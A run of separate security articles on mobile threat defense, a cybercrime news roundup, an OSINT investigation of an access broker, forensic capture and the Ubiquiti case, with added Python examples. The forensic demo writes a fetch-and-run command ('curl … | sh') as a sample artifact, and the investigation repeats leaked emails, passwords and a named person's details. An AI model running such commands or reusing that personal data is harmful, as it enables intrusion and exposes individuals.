The modern threat requires a modern security solution to stay ahead of the hacks and malware, minimizing the attack surface. Mobile threat defense (MTD) is enterprise security designed to stay ahead of the attackers, providing the visibility and confidence that IT and security teams need as more mobile endpoints connect into the corporate network.

The security posture of mobile endpoints connected to corporate networks, both managed and unmanaged, needs to be addressed so that none of these devices becomes the starting point for a much larger security incident.

Properly configured and integrated, advanced MTD solutions can enhance existing zero-trust controls by providing mobile device risk attestation. This integration and extended security capabilities are vital to shoring up defenses for enterprises evolving from EPP to XDR security solutions. Advanced MTD solutions provide the features, workflow, and capability that complement XDR capabilities on mobile devices.

IT and security leaders responsible for their enterprise’s mobile endpoint security should be aware that purpose-built mobile security applications are designed to do more than prevent attacks and bring a whole host of other advanced security features to the mobile devices. While legacy mobile security tools do exist, they lack the advanced approach to mobile endpoint security necessary to keep up with modern-day threats.

“MTD products not only prevent attacks but also detect and remediate them. MTD focuses on identifying and thwarting malicious threats, rather than relying on device management configuration to protect against simple user mistakes.

[We] see no value in adopting antivirus solutions that do not provide behavioral anomaly prevention and detection, as the underlying mobile platforms already perform signature-based scans to look for malware.” – Gartner Market Guide for Mobile Threat Defense, March 2021

Integrating Mobile Threat Defense and XDR

With MTD and XDR coming together, organizations are taking a step into the future of complete endpoint security, addressing all the devices from the phone in the pocket to the desktop in the office with advanced security solutions. The alliance between Zimperium and SentinelOne addresses the complete endpoint attack surface, delivering critical security controls to security teams and protection to employees near and far.

With the brand new SentinelOne Singularity™ Mobile application added to the lineup, SentinelOne now provides complete endpoint coverage and protection with the most advanced endpoint security solutions on the market, covering Android, ChromeOS, iOS, macOS, Linux, Windows and Windows Server operating systems, as well as IoT devices and cloud workloads.

Conclusion

SentinelOne Singularity™ Mobile customers can now manage mobile device security alongside their user workstations, cloud workloads, and IoT devices. Singularity™ Mobile brings behavioral AI-driven protection, detection, and response directly to iOS, Android, and ChromeOS devices. Part of the Singularity Platform, SentinelOne delivers mobile threat defense that is local, adaptive, and real-time, to thwart mobile malware and phishing attacks at the device, with or without a cloud connection.

About Zimperium

Zimperium, the global leader in mobile security, offers the only real-time, on-device, machine learning-based protection against Android, iOS, and Chromebook threats. Powered by z9, Zimperium protects against device, network, phishing, and malicious app attacks.


The Good, the Bad and the Ugly in Cybersecurity – Week 49

The Good

It’s been a great week for law enforcement. Just after we went to press last week, Interpol announced the arrest of over 1000 cyber criminals in an operation codenamed HAECHI-II (In Korea, Haechi is a popular mythical animal widely used as a symbol of justice).

In raw arrests, that’s twice as successful as its predecessor, HAECHI-I earlier this year, which itself resulted in the arrest of 500 cyber fraudsters. The latest operation took place in twenty countries and intercepted $27m of illicit funds. Cyber cops also froze 2,350 bank accounts connected to various forms of online crime, including money laundering, investment fraud and romance scams.

Meanwhile, there have been welcome developments in a case we reported on back in October involving bulletproof hosting services aiding and abetting cybercrime. The third of four men indicted under RICO charges has now been sentenced.

Aleksandr Grichishkin received a 5-year prison term for his role as a “founder and leader” of a gang that rented out IP addresses, servers and internet domains to spread malware such as Zeus, SpyEye, Citadel and the Blackhole Exploit Kit. Grichishkin’s sentence follows two- and four-year terms handed down to his co-conspirators. A fourth individual, Andrei Skvortsov, is yet to be sentenced. He faces a maximum penalty of 20 years.

The Bad

“Watch out for the quiet ones at the back” is a good adage in security in general, and when it comes to cybersecurity in particular, this means unnoticed devices like printers and IoT machines that can sit on our networks relatively forgotten in terms of endpoint protection.

This week, HP printers came to the forefront again as researchers disclosed details of flaws that could be used by attackers in remote as well as physical attacks. In one scenario, a user could be socially engineered to print out a malicious PDF containing an exploit for a font-parsing vulnerability. Just printing the document can give an attacker code execution rights, allowing data theft or lateral movement across the network.

On top of that, one of the vulnerabilities found is wormable, meaning that compromising one printer on the network could lead to the compromise of any other connected devices that are vulnerable to the same bugs. Researchers say around 150 models of multi-function printers (MFPs) are affected. The flaws, tracked as CVE-2021-39237 and CVE-2021-39238, were patched last month by HP.

The disclosure follows SentinelLabs’ discovery in July of high severity flaws in HP, Samsung and Xerox printer drivers affecting millions of printers worldwide and which could allow unprivileged users to run code in kernel mode.

While exploiting such flaws is by no means “low-hanging fruit”, the fact that network printers are often forgotten, unpatched and unprotected means they can present an attractive target for attackers. Ensuring you have visibility into everything connected to your network, particularly IoT devices like printers, is a must.

The Ugly

As the world continues to wrestle with the ongoing COVID-19 pandemic, threat actors have lost no time exploiting fears around the new Omicron variant in phishing lures.

This week’s egregious example involves an email scam purporting to come from the UK’s National Health Service offering recipients a free Omicron PCR test.

The email, which comes from a scam email address (contact-nhs@nhscontact.com), contains a “Get it now” button with a link to a fake NHS website. According to UK consumer watchdog Which?, the site directs users to enter personal details including full name, date of birth, address and phone number.

The email also contains plenty of the usual scare tactics to encourage people to click through to the malicious website. “What happens if you decline a COVID-19 Omicron test?”, the email asks, and goes on to state that “…we warned that testing is in the best interests of themselves, friends, and family. People who do not consent…must be isolated”.

The fake NHS website looks convincing and includes reassurances about “protecting the privacy” of personal information.

The “free” offer turns out to require victims to pay £1.24 for delivery of the phony test. The small amount of the charge serves both to add authenticity and to disguise the scammers’ real intent: gathering the payment details of the victims for account takeover, fraud, and identity theft.

Anyone who suspects they may have fallen victim to the scam is advised to contact their bank immediately, cancel any cards used in the transaction, and change account passwords. The Which? consumer service also provides help on how to recover money lost in a scam.

Who Is the Network Access Broker ‘Babam’?

Rarely do cybercriminal gangs that deploy ransomware gain the initial access to the target themselves. More commonly, that access is purchased from a cybercriminal broker who specializes in acquiring remote access credentials — such as usernames and passwords needed to remotely connect to the target’s network. In this post we’ll look at the clues left behind by “Babam,” the handle chosen by a cybercriminal who has sold such access to ransomware groups on many occasions over the past few years.

Since the beginning of 2020, Babam has set up numerous auctions on the Russian-language cybercrime forum Exploit, mainly selling virtual private networking (VPN) credentials stolen from various companies. Babam has authored more than 270 posts since joining Exploit in 2015, including dozens of sales threads. However, none of Babam’s posts on Exploit include any personal information or clues about his identity.

But in February 2016, Babam joined Verified, another Russian-language crime forum. Verified was hacked at least twice in the past five years, and its user database posted online. That information shows that Babam joined Verified using the email address “operns@gmail.com.” The latest Verified leak also exposed private messages exchanged by forum members, including more than 800 private messages that Babam sent or received on the forum over the years.

In early 2017, Babam confided to another Verified user via private message that he is from Lithuania. In virtually all of his forum posts and private messages, Babam can be seen communicating in transliterated Russian rather than by using the Cyrillic alphabet. This is common among cybercriminal actors for whom Russian is not their native tongue.

Cyber intelligence platform Constella Intelligence told KrebsOnSecurity that the operns@gmail.com address was used in 2016 to register an account at filmai.in, which is a movie streaming service catering to Lithuanian speakers. The username associated with that account was “bo3dom.”

A reverse WHOIS search via DomainTools.com says operns@gmail.com was used to register two domain names: bonnjoeder[.]com back in 2011, and sanjulianhotels[.]com (2017). It’s unclear whether these domains ever were online, but the street address on both records was “24 Brondeg St.” in the United Kingdom. [Full disclosure: DomainTools is a frequent advertiser on this website.]

A reverse search at DomainTools on “24 Brondeg St.” reveals one other domain: wwwecardone[.]com. Domains that begin with “www” are fairly common among phishers and among passive “typosquatting” sites that seek to siphon credentials from legitimate websites when people mistype a domain, such as accidentally omitting the “.” after typing “www”.

A banner from the homepage of the Russian language cybercrime forum Verified.

Searching DomainTools for the phone number in the WHOIS records for wwwecardone[.]com — +44.0774829141 — leads to a handful of similar typosquatting domains, including wwwebuygold[.]com and wwwpexpay[.]com. A different UK phone number in a more recent record for the wwwebuygold[.]com domain — 44.0472882112 — is tied to two more domains – howtounlockiphonefree[.]com, and portalsagepay[.]com. All of these domains date back to between 2012 and 2013.

The original registration records for the iPhone, Sagepay and Gold domains share an email address: devrian26@gmail.com. A search on the username “bo3dom” using Constella’s service reveals an account at ipmart-forum.com, a now-defunct forum concerned with IT products, such as mobile devices, computers and online gaming. That search shows the user bo3dom registered at ipmart-forum.com with the email address devrian27@gmail.com, and from an Internet address in Vilnius, Lithuania.

Devrian27@gmail.com was used to register multiple domains, including wwwsuperchange.ru back in 2008 (notice again the suspect “www” as part of the domain name). Gmail’s password recovery function says the backup email address for devrian27@gmail.com is bo3*******@gmail.com. Gmail accepts the address bo3domster@gmail.com as the recovery email for that devrian27 account.

According to Constella, the bo3domster@gmail.com address was exposed in multiple data breaches over the years, and in each case it used one of two passwords: “lebeda1” and “a123456”.

Searching in Constella for accounts using those passwords reveals a slew of additional “bo3dom” email addresses, including bo3dom@gmail.com. Pivoting on that address in Constella reveals that someone with the name Vytautas Mockus used it to register an account at mindjolt.com, a site featuring dozens of simple puzzle games that visitors can play online.

At some point, mindjolt.com apparently also was hacked, because a copy of its database at Constella says the bo3dom@gmail.com account used two passwords at that site: lebeda1 and a123456.

A reverse WHOIS search on “Vytautas Mockus” at DomainTools shows the email address devrian25@gmail.com was used in 2010 to register the domain name perfectmoney[.]co. This is one character off of perfectmoney[.]com, which is an early virtual currency that was quite popular with cybercriminals at the time. The phone number tied to that domain registration was “86.7273687”.

A Google search for “Vytautas Mockus” says there’s a person by that name who runs a mobile food service company in Lithuania called “Palvisa.” A report on Palvisa (PDF) purchased from Rekvizitai.vz — an official online directory of Lithuanian companies — says Palvisa was established in 2011 by a Vytautaus Mockus, using the phone number 86.7273687, and the email address bo3dom@gmail.com. The report states that Palvisa is active, but has had no employees other than its founder.

Reached via the bo3dom@gmail.com address, the 36-year-old Mr. Mockus expressed mystification as to how his personal information wound up in so many records. “I am not involved in any crime,” Mockus wrote in reply.

A rough mind map of the connections mentioned in this story.

The domains apparently registered by Babam over nearly 10 years suggest he started off mainly stealing from other cybercrooks. By 2015, Babam was heavily into “carding,” the sale and use of stolen payment card data. By 2020, he’d shifted his focus almost entirely to selling access to companies.
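The chain walked above (an email to reverse-WHOIS domains, a domain to a postal address and phone number, the phone number to more domains, a reused password to further mailboxes, and finally a company registry) is a graph walk over shared selectors. The Python below is an added example, not code from this post or from DomainTools, Constella or Flashpoint. Its records are constructed stand-ins with example.com identifiers rather than the real data in the post, `COMMON_SELECTORS` is an assumption about which selectors are too widely shared to pivot on, and `www_typosquat_target` flags the “www”-prefixed domains of the kind noted earlier.

```python
"""Selector pivoting over OSINT records, in the spirit of the chain above.

Every record (a WHOIS entry, a breach row, a forum leak, a company registry
entry) is a bag of selectors.  Two records are linked when they share a
selector; a breadth-first walk from a seed selector returns the whole cluster
and the pivot path to any selector of interest.
"""
from collections import defaultdict, deque

SELECTOR_KEYS = ("email", "phone", "address", "domain", "username", "password", "name")

# Assumption: selectors shared by too many unrelated people are ignored, or
# the walk links strangers (think privacy-proxy addresses or "123456").
COMMON_SELECTORS = {"password:123456", "password:password", "address:redacted for privacy"}

# Constructed stand-in records (example.com identifiers, not the real data).
RECORDS = [
    {"source": "forum-leak", "email": "seed@example.com", "username": "handle1"},
    {"source": "whois", "email": "seed@example.com", "domain": "alpha.example", "address": "1 Example St"},
    {"source": "whois", "domain": "wwwbank.example", "address": "1 Example St", "phone": "+44.1111111"},
    {"source": "whois", "domain": "wwwshop.example", "phone": "+44.1111111", "email": "second@example.com"},
    {"source": "forum-leak", "username": "handle1", "email": "third@example.com"},
    {"source": "breach", "email": "third@example.com", "password": "reused-pw"},
    {"source": "breach", "email": "fourth@example.com", "password": "reused-pw", "name": "J. Doe"},
    {"source": "registry", "name": "J. Doe", "phone": "+370.2222222", "email": "fourth@example.com"},
    {"source": "breach", "email": "fourth@example.com", "password": "123456"},
    {"source": "breach", "email": "stranger@example.net", "password": "123456"},
]


def build_graph(records):
    """Bipartite graph: ('rec', i) nodes <-> 'type:value' selector strings."""
    graph = defaultdict(set)
    for i, rec in enumerate(records):
        for key in SELECTOR_KEYS:
            if key in rec:
                sel = f"{key}:{rec[key].lower()}"
                if sel in COMMON_SELECTORS:
                    continue
                graph[("rec", i)].add(sel)
                graph[sel].add(("rec", i))
    return graph


def pivot(records, seed, target=None):
    """BFS from a seed selector.  Returns (sorted cluster selectors, path).

    path is the alternating selector/record chain from seed to target, or
    None when target is absent or unreachable."""
    graph = build_graph(records)
    start = seed.lower()
    parent = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        for nxt in sorted(graph.get(node, ()), key=str):
            if nxt not in parent:
                parent[nxt] = node
                queue.append(nxt)
    cluster = sorted(n for n in parent if isinstance(n, str))
    path = None
    if target and target.lower() in parent:
        path, node = [], target.lower()
        while node is not None:
            if isinstance(node, str):
                path.append(node)
            else:
                path.append(f"record#{node[1]}({records[node[1]]['source']})")
            node = parent[node]
        path.reverse()
    return cluster, path


def www_typosquat_target(domain):
    """'wwwecardone.com' -> 'ecardone.com': the site a user meant to type."""
    first, _, rest = domain.lower().partition(".")
    if first.startswith("www") and len(first) > 3 and rest:
        return f"{first[3:]}.{rest}"
    return None


if __name__ == "__main__":
    cluster, path = pivot(RECORDS, "email:seed@example.com", "name:J. Doe")
    print("cluster:", cluster)
    print("path:   ", " -> ".join(path))
    for sel in cluster:
        if sel.startswith("domain:") and www_typosquat_target(sel[7:]):
            print("typosquat?", sel[7:], "->", www_typosquat_target(sel[7:]))
```

The `COMMON_SELECTORS` filter is the part that separates a useful pivot from a false attribution: the password “123456” is shared by the stand-in for the subject and by an unrelated stranger, and without the filter the walk would pull the stranger into the cluster.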

A profile produced by threat intelligence firm Flashpoint says Babam has received at least four positive feedback reviews on the Exploit cybercrime forum from crooks associated with the LockBit ransomware gang.

The ransomware collective LockBit giving Babam positive feedback for selling access to different victim organizations. Image: Flashpoint

According to Flashpoint, in April 2021 Babam advertised the sale of Citrix credentials for an international company that is active in the field of laboratory testing, inspection and certification, and that has more than $5 billion in annual revenues and more than 78,000 employees.

Flashpoint says Babam initially announced he’d sold the access, but later reopened the auction because the prospective buyer backed out of the deal. Several days later, Babam reposted the auction, adding more information about the depth of the illicit access and lowering his asking price. The access sold less than 24 hours later.

“Based on the provided statistics and sensitive source reporting, Flashpoint analysts assess with high confidence that the compromised organization was likely Bureau Veritas, an organization headquartered in France that operates in a variety of sectors,” the company concluded.

In November, Bureau Veritas acknowledged that it shut down its network in response to a cyber attack. The company hasn’t said whether the incident involved ransomware and if so what strain of ransomware, but its response to the incident is straight out of the playbook for responding to ransomware attacks. Bureau Veritas has not yet responded to requests for comment; its latest public statement on Dec. 2 provides no additional details about the cause of the incident.

Flashpoint notes that Babam’s use of transliterated Russian persists on both Exploit and Verified until around March 2020, when he switches over to using mostly Cyrillic in his forum comments and sales threads. Flashpoint said this could be an indication that a different person started using the Babam account since then, or more likely that Babam had only a tenuous grasp of Russian to begin with and that his language skills and confidence improved over time.

Lending credence to the latter theory is that Babam still makes linguistic errors in his postings that suggest Russian is not his original language, Flashpoint found.

“The use of double “n” in such words as “проданно” (correct – продано) and “сделанны” (correct – сделаны) by the threat actor proves that this style of writing is not possible when using machine translation since this would not be the correct spelling of the word,” Flashpoint analysts wrote.

“These types of grammatical errors are often found among people who did not receive sufficient education at school or if Russian is their second language,” the analysis continues. “In such cases, when someone tries to spell a word correctly, then by accident or unknowingly, they overdo the spelling and make these types of mistakes. At the same time, colloquial speech can be fluent or even native. This is often typical for a person who comes from the former Soviet Union states.”

3 Ways to Speed Up Investigations with Modern DFIR

A guest post by Jessica Stanford, CMO at Cado Security

When it comes to attack containment, time is of the essence. The speed at which security teams can dive deep to determine root cause and scope is essential to fully remediating an incident before it’s at risk of escalating. Delays or hurdles that prevent a thorough investigation from occurring have significant impact and leave your organization vulnerable to future breaches.

Once malicious activity is detected, security analysts need to be able to quickly understand its impact:

  • What happened?
  • When did it happen?
  • Is this the first time it happened?
  • How many machines were involved?
  • How did the attackers get in?
  • Has data left the environment?

However, using traditional digital forensics and incident response (DFIR) approaches, it can take days to weeks to manually capture and process the data needed to answer these pressing questions. To make matters worse, due to the heavy uplift and time required, incidents often get closed without digging deep enough.

That’s where the combination of the SentinelOne Singularity XDR platform and Cado Response can help — by delivering the data and context security teams need to quickly identify the root cause of incidents and enable faster response.

The SentinelOne Singularity XDR Platform provides the broad visibility needed to detect and respond to malicious activity in real-time across user endpoints, cloud workloads and IoT. Many DFIR investigations begin with a high-severity detection – SentinelOne provides best-in-class behavioral detection with Storyline, as evidenced by the 2021 MITRE Engenuity ATT&CK evaluations. SOC teams use SentinelOne to ‘stop the bleeding’ and perform automated responses, such as killing processes, quarantining a threat or rolling back the effects of ransomware.

SentinelOne Remote Script Orchestration (RSO) takes automation within incident response a step further to enable security and IT teams to remotely execute customizable remediation and response actions and to send custom scripts to one machine, a few hundred machines, or even millions of machines concurrently.

DFIR investigations take incident response a level further by analyzing additional forensic data such as memory and disk snapshots. Joint customers can use RSO to deploy Cado Response, which provides deep forensic-level analysis, enabling DFIR teams to respond to present and future cyberattacks faster.

SentinelOne and Cado Security’s joint solution enables security teams to take a modern approach to DFIR by speeding up cyber investigations in three ways.

1. Automated Capture

A forensics analysis often requires massive amounts of data. Complicating things even further, this data can live across countless regions, systems and users. Capturing, processing, and triaging the data required to conduct a detailed investigation using traditional methods is no easy task. Fortunately, automation flips the script. By automating the most tedious parts of a forensics investigation, including data capture and processing, security teams can drastically reduce the amount of time and effort that’s required to understand the root cause and impact of an incident.
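What automated capture looks like at the collector end, as an added example that is not Cado Response’s or SentinelOne’s code: a Python script of the kind an orchestration tool such as RSO could push to an endpoint. It copies the named artifacts into a per-host case directory, hashes each file on the way in, re-hashes the stored copy, and writes a manifest whose own hash becomes the integrity reference for the capture. The file names and log contents in `demo()` are constructed.

```python
"""Endpoint artifact capture with integrity records.

Copies the named artifacts into a per-host case directory, hashes each on
the way in, re-hashes the stored copy to confirm the copy verified, and
writes a JSON manifest whose own SHA-256 is the chain-of-custody reference.
"""
import hashlib
import json
import shutil
import tempfile
import time
from pathlib import Path


def sha256_file(path, chunk=1 << 20):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def _utc(ts=None):
    return time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(ts))


def capture(artifact_paths, case_dir, host):
    """Capture artifacts into case_dir/<host>/ and return the manifest."""
    dest_root = Path(case_dir) / host
    dest_root.mkdir(parents=True, exist_ok=True)
    entries = []
    for i, src in enumerate(map(Path, artifact_paths)):
        if not src.is_file():
            # Record the miss and keep going: a partial capture beats none.
            entries.append({"path": str(src), "error": "not a regular file"})
            continue
        st = src.stat()
        dest = dest_root / f"{i:03d}_{src.name}"   # index avoids basename clashes
        shutil.copy2(src, dest)                    # copy2 keeps mtime for timelining
        digest = sha256_file(src)
        if sha256_file(dest) != digest:
            raise IOError(f"stored copy of {src} does not verify")
        entries.append({
            "path": str(src),
            "stored_as": str(dest),
            "size": st.st_size,
            "mtime_utc": _utc(st.st_mtime),
            "sha256": digest,
        })
    manifest = {"host": host, "captured_utc": _utc(), "artifacts": entries}
    manifest_path = dest_root / "manifest.json"
    manifest_path.write_text(json.dumps(manifest, indent=2, sort_keys=True))
    manifest["manifest_sha256"] = sha256_file(manifest_path)   # record this out of band
    return manifest


def verify(manifest):
    """Re-hash every stored copy; returns the source paths whose hash changed."""
    return [a["path"] for a in manifest["artifacts"]
            if "sha256" in a and sha256_file(a["stored_as"]) != a["sha256"]]


def demo():
    """Runs a capture over constructed sample files in a scratch directory."""
    work = Path(tempfile.mkdtemp())
    auth = work / "auth.log"
    auth.write_bytes(b"Dec  3 09:00:12 web01 sshd[4242]: Accepted password for svc_backup from 203.0.113.5\n")
    (work / "bash_history").write_bytes(b"curl http://203.0.113.5/x.sh | sh\n")
    m = capture([auth, work / "bash_history", work / "missing.log"], work / "case", host="web01")
    clean = verify(m)
    Path(m["artifacts"][0]["stored_as"]).write_bytes(b"tampered")  # simulate post-capture change
    return {
        "auth_path": str(auth),
        "auth_sha": m["artifacts"][0]["sha256"],
        "errors": [a["path"] for a in m["artifacts"] if "error" in a],
        "verify_clean": clean,
        "verify_after_tamper": verify(m),
        "manifest_sha256": m["manifest_sha256"],
    }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The manifest hash is the value to store in the case notes or ticket rather than on the endpoint: anything that can alter the stored copies can alter a manifest kept beside them.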

2. Leverage The Cloud

As mentioned above, when it comes to forensic investigations, speed is of the essence. Forensic investigations require complete visibility, across on-premises, hybrid, and cloud environments. Gaining access to the data is step one. Then analysts need to normalize and preserve the data for an investigation. This can require extensive time and manual effort but results in no added value until the processing is complete.

Using SentinelOne, DFIR teams can gain visibility across all environments, whether they be user endpoints or enterprise workloads, whether on-premises, hybrid or in public cloud environments like Amazon Web Services. With RSO, Cado Response automatically processes data from endpoints of interest, leveraging the cloud for rapid processing of hundreds of files and systems in parallel to drastically reduce the time it takes to begin an investigation from days to minutes. The cloud enables security analysts to get access to the information they need, when they need it.

3. Managing DFIR At Scale

Using automation, RSO enables rapid deployment of forensic tools across the entire endpoint fleet, helping teams manage IR processes at scale. From within SentinelOne, teams can deploy Cado Response, view the status of script deployment, and confirm complete forensic capture of all affected endpoints.

Capturing and processing 100% of the data from all impacted systems is a feat in and of itself, but it’s just the beginning of an investigation. Once the data is processed, security teams need to analyze it to identify the root cause and fully remediate an incident.

The challenge here is adding context and awareness to the data. Cado Response uses machine learning-driven analytics and threat intelligence to correlate systems, users, processes, files, and more. It also builds a complete timeline of events in a single pane of glass, so analysts can quickly visualize the scope of an incident and dive into the relevant data. This enables them to conduct an investigation in aggregate rather than analyzing systems one by one.

Preventing Future Breaches

Conducting a thorough forensics investigation post-breach is critical to identifying the root cause and preventing future breaches. That’s why Cado Response’s recently announced partnership with SentinelOne is so important: it delivers the breadth and depth security teams need to detect, investigate, and respond to incidents with unmatched speed.

SentinelOne Remote Script Orchestration (RSO) can alleviate the SOC burden of remote forensics and incident response. RSO allows customers to remotely investigate threats on multiple endpoints across the organization and to manage their entire fleet. It lets incident responders run scripts to collect data and respond to events on endpoints remotely. Through RSO, security analysts can launch Cado Response to perform an in-depth forensic investigation across their SentinelOne Singularity Platform-protected endpoints in a single click, simplifying forensic data capture and accelerating triage.

Incident responders can collect forensic artifacts, execute complex scripts and commands, and install IR tools such as Cado Response on thousands of Windows, Mac, and Linux endpoints simultaneously, via the SentinelOne console or API. Remote Script Orchestration includes a Script Library from SentinelOne with scripts for all platforms: PowerShell for Windows, and bash scripts for Linux and macOS.


The Cado Response platform is powered by a cloud-based architecture, which automatically scales up and down to provide rapid processing when needed and saves costs when not, drastically reducing time to evidence and time to response. The Cado Response platform simplifies investigation, enabling analysts to easily pivot across evidence items including impacted systems, users, processes, files, and more, so they can rapidly visualize incident scope.

Conclusion

With powerful remote script orchestration within the SentinelOne Singularity Platform and the cloud-native DFIR capabilities of Cado Response, incident responders have an effective toolset for collecting, analyzing, and actioning forensic data from across the endpoint and cloud workload fleet.

Learn more about SentinelOne and Cado Security in this upcoming webinar:

Automation Flips the Script: Augmenting Real-Time Detection with Modern DFIR.

Ubiquiti Developer Charged With Extortion, Causing 2020 “Breach”

In January 2021, technology vendor Ubiquiti Inc. [NYSE:UI] disclosed that a breach at a third party cloud provider had exposed customer account credentials. In March, a Ubiquiti employee warned that the company had drastically understated the scope of the incident, and that the third-party cloud provider claim was a fabrication. On Wednesday, a former Ubiquiti developer was arrested and charged with stealing data and trying to extort his employer while pretending to be a whistleblower.

Federal prosecutors say Nickolas Sharp, a senior developer at Ubiquiti, actually caused the “breach” that forced Ubiquiti to disclose a cybersecurity incident in January. They allege that in late December 2020, Sharp applied for a job at another technology company, and then abused his privileged access to Ubiquiti’s systems at Amazon’s AWS cloud service and the company’s GitHub accounts to download large amounts of proprietary data.

Sharp’s indictment doesn’t specify how much data he allegedly downloaded, but it says some of the downloads took hours, and that he cloned approximately 155 Ubiquiti data repositories via multiple downloads over nearly two weeks.

On Dec. 28, other Ubiquiti employees spotted the unusual downloads, which had leveraged internal company credentials and a Surfshark VPN connection to hide the downloader’s true Internet address. Assuming an external attacker had breached its security, Ubiquiti quickly launched an investigation.

But Sharp was a member of the team doing the forensic investigation, the indictment alleges.

“At the time the defendant was part of a team working to assess the scope and damage caused by the incident and remediate its effects, all while concealing his role in committing the incident,” wrote prosecutors with the Southern District of New York.

According to the indictment, on January 7 a senior Ubiquiti employee received a ransom email. The message was sent through an IP address associated with the same Surfshark VPN. The ransom message warned that internal Ubiquiti data had been stolen, and that the information would not be used or published online as long as Ubiquiti agreed to pay 25 Bitcoin.

The ransom email also offered to identify a purportedly still unblocked “backdoor” used by the attacker for the sum of another 25 Bitcoin (the total amount requested was equivalent to approximately $1.9 million at the time). Ubiquiti did not pay the ransom demands.

Investigators say they were able to tie the downloads to Sharp and his work-issued laptop because his Internet connection briefly failed on several occasions while he was downloading the Ubiquiti data. Those outages were enough to prevent Sharp’s Surfshark VPN connection from functioning properly — thus exposing his Internet address as the source of the downloads.

When FBI agents raided Sharp’s residence on Mar. 24, he reportedly maintained his innocence and told agents someone else must have used his PayPal account to purchase the Surfshark VPN subscription.

Several days after the FBI executed its search warrant, Sharp “caused false or misleading news stories to be published about the incident,” prosecutors say. Among the claims made in those news stories was that Ubiquiti had neglected to keep access logs that would allow the company to understand the full scope of the intrusion. In reality, the indictment alleges, Sharp had shortened to one day the amount of time Ubiquiti’s systems kept certain logs of user activity in AWS.

“Following the publication of these articles, between Tuesday, March 30, 2021 and Wednesday March 31, [Ubiquiti’s] stock price fell approximately 20 percent, losing over four billion dollars in market capitalization,” the indictment states.

Sharp faces four criminal counts, including wire fraud, intentionally damaging protected computers, transmission of interstate communications with intent to extort, and making false statements to the FBI.

News of Sharp’s arrest was first reported by BleepingComputer, which wrote that while the Justice Department didn’t name Sharp’s employer in its press release or indictment, all of the details align with previous reporting on the Ubiquiti incident and information presented in Sharp’s LinkedIn account. A link to the indictment is here (PDF).

The Complete Guide to Understanding Apple Mac Security for Enterprise | Read the Free Ebook

SentinelOne is delighted to release its third, comprehensive Mac-focused ebook for enterprise security teams, the Complete Guide to Understanding Apple Mac Security for Enterprise.

Following on from How To Reverse macOS malware and A Guide to macOS Threat Hunting & Incident Response, our latest macOS ebook is an all-encompassing guide to the native security technologies built into macOS: how they work, where they fail, what they protect against, and what they don’t.

Who is the macOS Security Ebook For?

The SentinelOne Complete Guide to Understanding Apple Mac Security for Enterprise is an essential reference for anyone needing to understand the strengths and weaknesses of the security controls built into Apple Macs and the macOS platform.

The guide covers macOS right up to and including the latest release of macOS 12 Monterey and answers many common questions asked by system administrators and security teams managing Mac devices, including:

  • How secure are Macs by design?
  • Are third-party AV security controls required on macOS?
  • What kind of security software works best on macOS?
  • Which approaches to macOS security are the most effective?
  • What sort of threats do businesses with macOS fleets face in 2021?

What Will You Learn from the macOS Security Ebook?

In the guide, you’ll find detailed sections on areas such as:

  • Architecture & Codesigning: Does the new M1 architecture provide increased security over Intel machines? Is it still possible to run unsigned malicious code on macOS Monterey on both of these architectures?
  • Gatekeeper: How easy is it for malware or malicious insiders to circumvent Gatekeeper’s controls? Are these bypasses used by in-the-wild malware?
  • Notarization & OCSP: What do these technologies achieve, and what are their limitations? How does malware circumvent these checks?
  • XProtect and MRT: How do these technologies work on modern versions of macOS, how can you test if they are protecting against specific kinds of malware, and how effective are they?
  • TCC Privacy controls: How well does TCC protect sensitive data on a Mac, and in what situations does TCC fail to work?

What Kind of Malware Threats Target macOS?

Throughout, the guide discusses the Mac’s built-in security technologies with references to real, in-the-wild malware such as XCSSET, Shlayer, Bundlore, Adload and others, describing exactly how security breaches can occur on systems that remain unprotected by additional security controls.

XCSSET malware tries to social engineer victims for additional privileges

Administrators and security teams charged with protecting macOS endpoints will learn about vulnerabilities in Apple’s platform that can be and are used by threat actors to compromise Mac devices, circumvent code signing requirements, beat Gatekeeper, bypass OCSP and Notarization, and defeat TCC privacy protections.

Learn How to Test Mac AV Software

SentinelOne’s Complete Guide to Understanding Apple Mac Security for Enterprise also includes sections on how to test security products against known malware samples, and what to look out for when evaluating third-party security products for Mac. Learn why, for example, a revoked code signature does not mean your Macs are protected from a particular malware family.

Only last month, we saw how a new targeted threat, macOS.Macma, was able to beat Apple’s on-device security and yet was easily detected by third-party behavioral engines like SentinelOne.

SentinelOne’s behavioral AI detects macOS.Macma on execution without pre-defined signatures

This guide also explains, with examples, how Mac admins can test for themselves whether the Mac’s own AV tools, XProtect and MRT (Malware Removal Tool), have been updated to protect against a particular threat or not. Learn how to test which malware you are protected from, and which you are not.

Why You Should Read the macOS Security Ebook

Apple Mac computers are increasingly common in today’s enterprise. Despite its shared Unix heritage with Linux, Apple’s macOS is idiosyncratic, as are the attack vectors it is susceptible to, and the security implications of running a fleet of Macs in the enterprise are not widely understood. This is even more true now that Apple has moved away from the Intel architecture to its own implementation of ARM, ‘Apple silicon’.

Throughout this ebook, we illustrate areas where Macs face security risks by referencing real, in-the-wild malware that we have seen emerge or adapt in the last 12 to 18 months.

It’s vital that enterprise security teams managing a fleet of Macs are up-to-date with just how the latest threats can and do target the macOS platform.

This guide will help security teams bridge the gap and understand how best to protect Macs in the enterprise.
